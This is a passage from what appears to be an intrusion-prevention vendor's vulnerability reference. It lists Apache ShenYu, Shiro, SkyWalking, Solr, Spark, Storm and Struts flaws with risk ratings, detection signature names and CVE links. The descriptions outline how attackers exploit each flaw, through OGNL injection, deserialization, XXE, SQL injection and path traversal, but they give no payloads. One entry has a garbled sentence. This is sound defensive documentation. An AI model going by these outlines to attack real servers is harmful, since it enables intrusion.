sgpkg-ips-1425-5242

Last changed:

sgpkg-ips-1425-5242

Platform:

Generic

Software:

Apache ShenYu Admin

Type:

Malfunction

Description:

A vulnerability in Apache ShenYu Admin, versions 2.3.0 and 2.4.0, which allows remote attackers to bypass access control policy by sending crafted requests to the target server, due to improper handling of incoming HTTP requests.

Situation:

File-Text_Apache-ShenYu-Admin-JWT-Authentication-Bypass-Vulnerability

References:

CVE-2021-37580
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37580

Apache-ShenYu-Plugin-API-Information-Disclosure

About this vulnerability:

A vulnerability in Apache ShenYu Admin.

Risk:

High

First detected in:

sgpkg-ips-1451-5242

Last changed:

sgpkg-ips-1451-5242

Platform:

Generic

Software:

Apache ShenYu Admin

Type:

Malfunction

Description:

A vulnerability in Apache ShenYu Admin, versions 2.4.0 and 2.4.1, which allows remote attackers to gain sensitive infomation and create plugins by sending a crafted request, due to the improper authentication for the /plugin API endpoint.

Situation:

HTTP_CS-Apache-ShenYu-Plugin-API-Information-Disclosure

References:

CVE-2022-23944
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23944

Apache-Shiro-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in Apache Shiro detected

Risk:

High

First detected in:

sgpkg-ips-1404-5242

Last changed:

sgpkg-ips-1404-5242

Platform:

Generic

Software:

Apache Shiro

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Apache Shiro detected. This situation can generate false-positives on legit traffic.

Situation:

HTTP_CSH-Apache-Shiro-Remote-Code-Execution

References:

CVE-2016-4437
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4437

Apache-SkyWalking-Alarm-Wildcard-Search-Graphql-SQL-Injection

About this vulnerability:

A vulnerability in Apache Software Foundation SkyWalking

Risk:

High

First detected in:

sgpkg-ips-1288-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache SkyWalking

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in Apache SkyWalking H2/MySQL storage implementations. The vulnerability is due to insufficient validation of the user-supplied input for wildcard alarm search query through GraphQL protocol. A remote attacker could exploit this vulnerability by sending malicious requests to a vulnerable Apache SkyWalking storage. Successful exploitation of this vulnerability could result in execution of arbitrary SQL code and lead to information disclosure.

Situation:

File-Text_Apache-SkyWalking-Alarm-Wildcard-Search-Graphql-SQL-Injection

References:

CVE-2020-13921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13921

Apache-SkyWalking-Graphql-Protocol-SQL-Injection

About this vulnerability:

A vulnerability in Apache SkyWalking

Risk:

High

First detected in:

sgpkg-ips-1288-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache SkyWalking

Type:

SQL Injection

Description:

There exists a vulnerability in Apache SkyWalking, versions 6.0.0 to 6.6.0 and 7.0.0, which allows remote attackers to execute arbitrary SQL commands and disclose information due to the lack of input validation for a metadata query through the GraphQL protocol.

Situation:

HTTP_CRL-Apache-SkyWalking-Graphql-Protocol-SQL-Injection

References:

CVE-2020-9483
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9483

Apache-Solr-Config-API-Insecure-Deserialization

About this vulnerability:

A vulnerability in Apache Software Foundation Solr

Risk:

Moderate

First detected in:

sgpkg-ips-1146-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Solr

Type:

Input Validation

Description:

Insufficient validation of requests to the Config API in Apache Solr causes an insecure deserialization vulnerability. A successful exploit allows an attacker to run arbitrary code on the target system with the privileges of the server process.

Situation:

File-Text_Apache-Solr-Config-API-Insecure-Deserialization

References:

CVE-2019-0192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0192

Apache-Solr-Configset-Upload-Directory-Traversal

About this vulnerability:

A vulnerability in Apache Solr

Risk:

High

First detected in:

sgpkg-ips-1841-5242

Last changed:

sgpkg-ips-1841-5242

Platform:

Generic

Software:

Apache Solr

Type:

Directory Traversal

Description:

A vulnerability in Apache Solr, versions 6.6.0 to 9.8.0, which allows remote attackers to write arbitrary files on a target server by sending a crafted request, due to the configSet upload API being susceptible to zip slip archives.

Situation:

File-Member-Name_Apache-Solr-Configset-Upload-Directory-Traversal

References:

CVE-2024-52012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-52012

Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386

About this vulnerability:

A vulnerability in Apache Solr

Risk:

High

First detected in:

sgpkg-ips-1714-5242

Last changed:

sgpkg-ips-1714-5242

Platform:

Generic

Software:

Apache Solr

Type:

Input Validation

Description:

An unrestricted file upload vulnerability has been reported in Apache Solr. The vulnerability is due to the software allowing Java jar and class files to be uploaded through the ConfigSets API. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of the user running the vulnerable server.

Situation:

HTTP_CSU-Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386
File-Binary_Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386
File-Zip_Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386
File-Member-Name_Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386

References:

CVE-2023-50386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50386

Apache-Solr-Configsets-Xml-External-Entity-Expansion-Information-Disclosure

About this vulnerability:

A vulnerability in Apache Software Foundation Solr

Risk:

Moderate

First detected in:

sgpkg-ips-1087-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Solr

Type:

Input Validation

Description:

There has been reported an XML external entity expansion vulnerability in Apache Solr. This vulnerability can be exploited by sending a crafted http request to the target server. Successful exploitation leads in disclosure of file or directory contents.

Situation:

File-TextId_Apache-Solr-Configsets-Xml-External-Entity-Expansion-Information-Disclosure

References:

CVE-2018-8026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8026

Apache-Solr-Data-Import-Handler-XML-External-Entity-Information-Disclosure

About this vulnerability:

A vulnerability in Apache Software Foundation Solr

Risk:

Moderate

First detected in:

sgpkg-ips-1059-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Solr

Type:

Input Validation

Description:

Improper handling of submitted XML content causes an information disclosure vulnerability in Apache Solr. A successful exploit allows an attacker to access arbitrary files on the target system.

Situation:

HTTP_CRL-Apache-Solr-Data-Import-Handler-XML-External-Entity-Expansion-Information-Disclosure

References:

CVE-2018-1308
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1308

Apache-Solr-Dataimporthandler-Remote-Code-Execution

About this vulnerability:

A vulnerability in Apache Solr

Risk:

Moderate

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Solr

Type:

Input Validation

Description:

There exists a remote code execution vulnerability in Apache Solr. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-Apache-Solr-Dataimporthandler-Remote-Code-Execution

References:

CVE-2019-0193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0193

Apache-Solr-Fake-URL-Authentication-Bypass

About this vulnerability:

A vulnerability in Apache Solr

Risk:

Moderate

First detected in:

sgpkg-ips-1808-5242

Last changed:

sgpkg-ips-1808-5242

Platform:

Generic

Software:

Apache Solr

Type:

Malfunction

Description:

Improper handling of URLs causes an authentication bypass vulnerability in Apache Solr. A successful exploitation allows an attacker to access privileged API endpoints without authentication.

Situation:

HTTP_CSU-Apache-Solr-Fake-URL-Authentication-Bypass

References:

CVE-2024-45216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45216

Apache-Solr-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in Apache Solr detected

Risk:

High

First detected in:

sgpkg-ips-1405-5242

Last changed:

sgpkg-ips-1405-5242

Platform:

Generic

Software:

Apache Solr

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Apache Solr detected.

Situation:

HTTP_CSU-Apache-Solr-Remote-Code-Execution

References:

CVE-2019-17558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17558

Apache-Solr-Replicationhandler-Server-Side-Request-Forgery

About this vulnerability:

A vulnerability in Apache Software Foundation Solr

Risk:

High

First detected in:

sgpkg-ips-1368-5242

Last changed:

sgpkg-ips-1368-5242

Platform:

Generic

Software:

Apache Solr

Type:

Input Validation

Description:

A server-side request forgery vulnerability has been reported in Apache Solr. The vulnerability is due to a missing validation of the masterUrl or leaderUrl request parameter to the /replication endpoint. A remote attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation results in information disclosure, spoofing conditions and arbitrary file write conditions.

Situation:

HTTP_CSU-Apache-Solr-Replicationhandler-Server-Side-Request-Forgery

References:

CVE-2021-27905
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27905

Apache-Solr-Solrresourceloader-Directory-Traversal

About this vulnerability:

A vulnerability in Apache Software Foundation Solr

Risk:

High

First detected in:

sgpkg-ips-556-5211

Last changed:

sgpkg-ips-1349-5242

Platform:

Generic

Software:

Apache Solr

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Apache Solr. The vulnerability is due to insufficient validation of the resource paths passed to certain Solr REST services. A remote attacker can exploit this vulnerability by sending a specially crafted request to Apache Solr, which leads to execution of any XSLT file that exists on the target server.

Situation:

HTTP_CSU-Apache-Solr-Solrresourceloader-Directory-Traversal

References:

CVE-2013-6397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6397

BID-63935
http://www.securityfocus.com/bid/63935

OSVDB-100374
http://www.osvdb.org/100374

Apache-Solr-Xmlparser-XML-External-Entity-Expansion-Remote-Code-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation Solr

Risk:

Moderate

First detected in:

sgpkg-ips-1008-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Solr

Type:

Input Validation

Description:

Improper handling of external XML entities causes a remote code execution in Apache Solr. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Apache-Solr-Xmlparser-XML-External-Entity-Expansion-Remote-Code-Execution

References:

CVE-2017-12629
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12629

Apache-Source-Asp-File-Disclosure

About this vulnerability:

Apache source.asp file disclosure

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache::ASP

Type:

Format String

Description:

The Apache module Apache::ASP version 1.93 has a vulnerability that allows reading and possibly writing files in the same directory as the vulnerable source.asp file. This may even lead to a remote system compromise with the Web server's privileges.

Situation:

HTTP_CSU-Apache-Source-Asp

References:

CVE-2000-0628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0628

BID-1457
http://www.securityfocus.com/bid/1457

Apache-Spark-Auth-enabled-Standalone-Master-Command-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation Spark

Risk:

High

First detected in:

sgpkg-ips-1370-5242

Last changed:

sgpkg-ips-1370-5242

Platform:

Generic

Software:

Apache Spark

Type:

Malfunction

Description:

A command execution vulnerability has been reported in Apache Spark. The vulnerability is due to improper handling of specific RPC request types. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the master host. A successful attack may result in the execution of arbitrary code in the security context of the user running a worker host.

Situation:

Generic_CS-Apache-Spark-Auth-enabled-Standalone-Master-Command-Execution

References:

CVE-2020-9480
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9480

Apache-Spark-Getunixgroups-Command-Injection

About this vulnerability:

A vulnerability in Apache Software Foundation Spark

Risk:

Moderate

First detected in:

sgpkg-ips-1487-5242

Last changed:

sgpkg-ips-1487-5242

Platform:

Generic

Software:

Apache Spark

Type:

Input Validation

Description:

Improper parsing of user requests when an ACL is enabled causes a command injection vulnerability in Apache Spark. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Apache-Spark-Getunixgroups-Command-Injection

References:

CVE-2022-33891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33891

Apache-Ssl-DoS-With-Plain-HTTP-Request

About this vulnerability:

Apache SSL Denial of Service using plain HTTP requests

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1802-5242

Platform:

Linux; OS X

Software:

Apache

Type:

Resource Starvation

Description:

Apache version 2.0.48 and older 2.0 suffer from a memory leak in mod_ssl. This memory leak can be triggered using plain HTTP requests to the SSL port and can cause a denial of service. The modssl leaks an SSL structure for each http request.

References:

CVE-2004-0113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0113

BID-9826
http://www.securityfocus.com/bid/9826

OSVDB-4182
http://www.osvdb.org/4182

Apache-Storm-Gettopologyhistory-Command-Injection

About this vulnerability:

A vulnerability in Apache Software Foundation Storm

Risk:

Moderate

First detected in:

sgpkg-ips-1419-5242

Last changed:

sgpkg-ips-1419-5242

Platform:

Generic

Software:

Apache Storm

Type:

Input Validation

Description:

Missing input validation of user supplied data in requests sent to the getTopologyHistory service causes a command injection vulnerability in Apache Storm. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Apache-Storm-Gettopologyhistory-Command-Injection

References:

CVE-2021-38294
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38294

Apache-Struts-2-Commons-Fileupload-Insecure-Deserialization

About this vulnerability:

A vulnerability in Apache Software Foundation Struts 2

Risk:

Moderate

First detected in:

sgpkg-ips-1117-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts

Type:

Input Validation

Description:

There has been reported an insecure deserialization vulnerability in a dependency called FileUpload of Apache Struts 2. A remote attacker can send a crafted payload to the target server to gain arbitrary code execution.

Situation:

Generic_SS-Apache-Struts-2-Commons-Fileupload-Insecure-Deserialization

References:

CVE-2016-1000031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000031

Apache-Struts-2-Conversionerrorinterceptor-OGNL-Script-Injection

About this vulnerability:

A vulnerability in Apache Software Foundation Struts 2

Risk:

High

First detected in:

sgpkg-ips-440-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts

Type:

Malfunction

Description:

A script injection vulnerability has been found in Apache Struts 2. The vulnerability is due to a design error: HTTP request parameters are interpreted as OGNL expressions when conversion errors occur. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a vulnerable Struts 2 web application. A successful attack will result in the execution of arbitrary OGNL expressions (possibly OS commands) in the security context of the web application server.

Situation:

HTTP_CSU-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Command-Execution

References:

CVE-2012-0391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391

OSVDB-78277
http://www.osvdb.org/78277

Apache-Struts-2-Cookieinterceptor-OGNL-Script-Injection

About this vulnerability:

A vulnerability in Apache Software Foundation Struts 2

Risk:

Moderate

First detected in:

sgpkg-ips-440-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts

Type:

Malfunction

Description:

There is a remote code execution vulnerability in Apache's Struts 2 web application framework. The vulnerability is due to the interpretation of cookie names as OGNL expressions. A remote attacker can exploit this vulnerability by sending a crafted HTTP request to a vulnerable server. A successful attack attempt could result in the execution of arbitrary Java code, including the launching of OS commands.

Situation:

HTTP_CSH-Apache-Struts-2-Cookieinterceptor-OGNL-Script-Injection

References:

CVE-2012-0392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0392

OSVDB-78108
http://www.osvdb.org/78108

Apache-Struts-2-Developer-Mode-OGNL-Execution

About this vulnerability:

An Apache Struts 2 Developer Mode OGNL Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-782-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts 2

Type:

Configuration Error

Description:

A vulnerability in Apache Struts 2 running in developer mode which allows remote attackers to execute arbitrary java code due to the DebuggingInterceptor allowing evaluation and execution of OGNL expressions.

Situation:

HTTP_CSU-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Command-Execution

References:

CVE-2012-0394
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394

OSVDB-78276
http://www.osvdb.org/78276

Apache-Struts-2-Parametersinterceptor-OGNL-Command-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation Struts 2

Risk:

High

First detected in:

sgpkg-ips-445-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts

Type:

Input Validation

Description:

There is a command execution vulnerability in the web application framework Apache Struts2. The vulnerability is due to insufficient input validation in the ParametersInterceptor component when parsing incoming HTTP requests. A remote attacker can leverage this vulnerability by sending a crafted HTTP request to a target system. In an attack scenario, where arbitrary commands are executed on the target machine, the malicious command will be executed within the security context of the target service.

Situation:

HTTP_CSU-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Command-Execution

References:

CVE-2011-3923
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3923

BID-51628
http://www.securityfocus.com/bid/51628

OSVDB-78109
http://www.osvdb.org/78109

Apache-Struts-2-Rest-Plugin-Xstream-Denial-Of-Service

About this vulnerability:

A vulnerability in XStream XStream

Risk:

Moderate

First detected in:

sgpkg-ips-988-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts

Type:

Input Validation

Description:

Improper validation of XML input by the XStream library causes a denial of service vulnerability in Apache Struts. A successful exploit can cause a denial of service condition by means of stopping the server process.s vulnerability by sending a crafted XML payload to the target server. Successful exploitation will cause the application server to terminate, resulting in a denial-of-service condition.

Situation:

File-Text_Apache-Struts-2-Rest-Plugin-Xstream-Denial-Of-Service

References:

CVE-2017-9793
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9793

Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization

About this vulnerability:

A vulnerability in Apache Software Foundation Struts

Risk:

High

First detected in:

sgpkg-ips-987-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts 2

Type:

Input Validation

Description:

There exists an insecure deserialization vulnerability in Apache Struts 2 REST Plugin. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

References:

CVE-2017-9805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805

Apache-Struts-2-Struts-1-Plugin-Remote-Code-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation Struts

Risk:

High

First detected in:

sgpkg-ips-1371-5242

Last changed:

sgpkg-ips-1371-5242

Platform:

Generic

Software:

Apache Struts

Type:

Input Validation

Description:

A remote code execution vulnerability exists in Apache Struts. The vulnerability is due to improper validation of user-provided input passed to the ActionMessage class. A remote attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation will allow an attacker to execute arbitrary code with the privileges of the server.

Situation:

HTTP_CRL-Apache-Struts-2-Struts-1-Plugin-Remote-Code-Execution

References:

CVE-2017-9791
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9791

Apache-Struts-Actionform-Classloader-Security-Bypass

About this vulnerability:

A vulnerability in Apache Software Foundation Struts

Risk:

High

First detected in:

sgpkg-ips-582-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts

Type:

Input Validation

Description:

A security bypass vulnerability exists in Apache Struts. The vulnerability is due to inadequate validation of data processed by the ActionForm class allowing for manipulation of the ClassLoader. A remote unauthenticated attacker could exploit this vulnerability by providing a "class" parameter in an HTTP request. Successful exploitation will result in a security bypass which could lead to sandbox bypass and arbitrary code execution.

Situation:

HTTP_CRL-Apache-Struts-Multiple-Classloaders-Security-Bypass

References:

CVE-2014-0114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114

BID-67121
http://www.securityfocus.com/bid/67121

OSVDB-106409
http://www.osvdb.org/106409

Apache-Struts-Classloader-Manipulation-Remote-Code-Execution

About this vulnerability:

A vulnerability in Apache-Struts ClassLoader Manipulation

Risk:

High

First detected in:

sgpkg-ips-659-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts

Type:

Code Injection

Description:

A vulnerability in Apache Struts ParametersInterceptor, which does not properly restrict access to the getClass method, allows remote attackers to manipulate the ClassLoader and execute arbitrary code via a crafted request.

Situation:

HTTP_CRL-Apache-Struts-Multiple-Classloaders-Security-Bypass

References:

CVE-2014-0112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0112

Apache-Struts-Cookieinterceptor-Classloader-Security-Bypass

About this vulnerability:

A vulnerability in Apache Software Foundation Struts

Risk:

High

First detected in:

sgpkg-ips-581-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts

Type:

Input Validation

Description:

A security bypass vulnerability exists in Apache Struts. The vulnerability is due to inadequate validation of data processed by Cookie Interceptor allowing for manipulation of the ClassLoader. A remote attacker could exploit this vulnerability by providing a "class" cookie in an HTTP request. Successful exploitation could lead to a security bypass condition due to ClassLoader manipulation.

Situation:

HTTP_CHS-Apache-Struts-Cookieinterceptor-Classloader-Security-Bypass

References:

CVE-2014-0113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0113

OSVDB-103918
http://www.osvdb.org/103918

Apache-Struts-Dynamic-Method-Invocation-Remote-Code-Execution

About this vulnerability:

An Apache Struts Dynamic Method Invocation Remote Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-767-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts

Type:

Malfunction

Description:

A vulnerability in Apache Struts, versions 2.x before 2.3.20.2, 2.3.24.x before 2.3.24.2, and 2.3.28.x before 2.3.28.1, which allows remote attackers to execute arbitrary code via method: prefix.

Situation:

HTTP_CSU-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Command-Execution

References:

CVE-2016-3081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3081

Apache-Struts-File-Upload-Vulnerability-CVE-2023-50164

About this vulnerability:

A vulnerability in Apache Struts

Risk:

High

First detected in:

sgpkg-ips-1665-5242

Last changed:

sgpkg-ips-1665-5242

Platform:

Generic

Software:

Apache Struts

Type:

Input Validation

Description:

A file upload vulnerability has been reported in Apache Struts 2. This vulnerability can lead to unauthenticated remote code execution.

Situation:

HTTP_CS-Apache-Struts-File-Upload-Vulnerabilities-CVE-2023-50164-CVE-2024-53677

References:

CVE-2023-50164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50164

Apache-Struts-File-Upload-Vulnerability-CVE-2024-53677

About this vulnerability:

A vulnerability in Apache Struts

Risk:

High

First detected in:

sgpkg-ips-1841-5242

Last changed:

sgpkg-ips-1841-5242

Platform:

Generic

Software:

Apache Struts

Type:

Input Validation

Description:

A file upload vulnerability has been reported in Apache Struts 2. This vulnerability can lead to unauthenticated remote code execution.

Situation:

HTTP_CS-Apache-Struts-File-Upload-Vulnerabilities-CVE-2023-50164-CVE-2024-53677

References:

CVE-2024-53677
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53677

Apache-Struts-Jakarta-Multipart-Parser-Remote-Code-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation Struts 2

Risk:

High

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1621-5242

Platform:

Generic

Software:

Apache Struts 2

Type:

Malfunction

Description:

There exists a code execution vulnerability in Apache Struts. A remote attacker can use this to execute arbitrary code on the affected system.

References:

CVE-2017-5638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638

Apache-Struts-OGNL-Expressions-DefaultActionMapper-Code-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation Struts 2

Risk:

High

First detected in:

sgpkg-ips-534-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts 2

Type:

Malfunction

Description:

A code execution vulnerability exists in Apache Struts Object-Graph Navigation Language (OGNL) expressions. The vulnerability is due to the failure of DefaultActionMapper to sanitize input following "action:", "redirect:" or "redirectAction:" expressions leading to code injection. A remote attacker could exploit this vulnerability by sending crafted HTTP requests to a server using a vulnerable version of the software. Successful exploitation will allow an attacker to execute arbitrary code on the system.

Situation:

HTTP_CRL-Apache-Struts-OGNL-Expressions-DefaultActionMapper-Code-Execution

References:

CVE-2013-2251
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251

BID-61189
http://www.securityfocus.com/bid/61189

OSVDB-95405
http://www.osvdb.org/95405

Apache-Struts-OGNL-Remote-Code-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation Struts

Risk:

Moderate

First detected in:

sgpkg-ips-1276-5242

Last changed:

sgpkg-ips-1341-5242

Platform:

Generic

Software:

Apache Struts

Type:

Input Validation

Description:

Insufficient input validation causes a vulnerability in Apache Struts. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CS-Apache-Struts-OGNL-Remote-Code-Execution
HTTP_CRL-Apache-Struts-OGNL-Remote-Code-Execution

References:

CVE-2019-0230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0230

Apache-Struts-OGNL-Remote-Code-Execution-CVE-2020-17530

About this vulnerability:

A vulnerability in Apache Software Foundation Struts

Risk:

High

First detected in:

sgpkg-ips-1310-5242

Last changed:

sgpkg-ips-1341-5242

Platform:

Generic

Software:

Apache Struts

Type:

Input Validation

Description:

A remote code execution has been reported in Apache Struts framework. The vulnerability is due to insufficient input validation leading to a forced double OGNL evaluation when evaluating raw user input. A remote attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation will allow an attacker to execute arbitrary code with the privileges of the server.

Situation:

HTTP_CS-Apache-Struts-OGNL-Remote-Code-Execution-CVE-2020-17530
HTTP_CRL-Apache-Struts-OGNL-Remote-Code-Execution-CVE-2020-17530

References:

CVE-2020-17530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17530

Apache-Struts-Parametersinterceptor-Classloader-Security-Bypass

About this vulnerability:

A vulnerability in Apache Software Foundation Struts

Risk:

High

First detected in:

sgpkg-ips-581-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts

Type:

Input Validation

Description:

A security-bypass vulnerability exists in Apache Struts. The vulnerability is due to inadequate validation of data processed by ParametersInterceptor allowing for manipulation of the ClassLoader. A remote attacker could exploit this vulnerability by providing a class parameter in a request. Successful exploitation could lead to a security bypass condition due to ClassLoader manipulation.

Situation:

HTTP_CRL-Apache-Struts-Multiple-Classloaders-Security-Bypass

References:

CVE-2014-0094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0094

BID-65999
http://www.securityfocus.com/bid/65999

OSVDB-103918
http://www.osvdb.org/103918

Apache-Struts-RCE-CVE-2018-11776

About this vulnerability:

A vulnerability in Apache Software Foundation Struts

Risk:

Moderate

First detected in:

sgpkg-ips-1095-5242

Last changed:

sgpkg-ips-1477-5242

Platform:

Generic

Software:

Apache Struts

Type:

Malfunction

Description:

A Remote Code Execution vulnerability exists in Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16.

Situation:

HTTP_CSU-Suspicious-OGNL-Expression
HTTP_CSU-Apache-Struts-RCE-CVE-2018-11776
HTTP_CSU-Suspicious-OGNL-Expression-2

References:

CVE-2018-11776
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776

Apache-Struts-Rest-Plugin-DMI-Code-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation Struts 2

Risk:

High

First detected in:

sgpkg-ips-770-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts 2

Type:

Input Validation

Description:

There exists a code execution vulnerability in Apache Struts.

Situation:

HTTP_CRL-Apache-Struts-Rest-Plugin-DMI-Code-Execution

References:

CVE-2016-3087
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3087

Apache-Struts-Url-And-Anchor-Tag-Includeparams-OGNL-Command-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation Struts

Risk:

High

First detected in:

sgpkg-ips-525-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts

Type:

Malfunction

Description:

A command execution vulnerability exists in Apache Struts Object-Graph Navigation Language (OGNL) expressions. The vulnerability is due to the way parameters passed via Struts s:a and s:url tags to the server are evaluated by OGNL when the includeParams field is "get" or "all". The url/a tags resolve every parameter passed to them, allowing arbitrary OGNL expressions encoded into the URL to be evaluated bypassing both Struts and OGNL library protections. A remote attacker could exploit this vulnerability by sending crafted HTTP requests to a server using a vulnerable version of the software. Successful exploitation will allow an attacker to execute arbitrary commands in the context of the server. CVE-2013-1966 is also covered as it had an incomplete fix.

Situation:

HTTP_CSU-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Command-Execution

References:

CVE-2013-2115
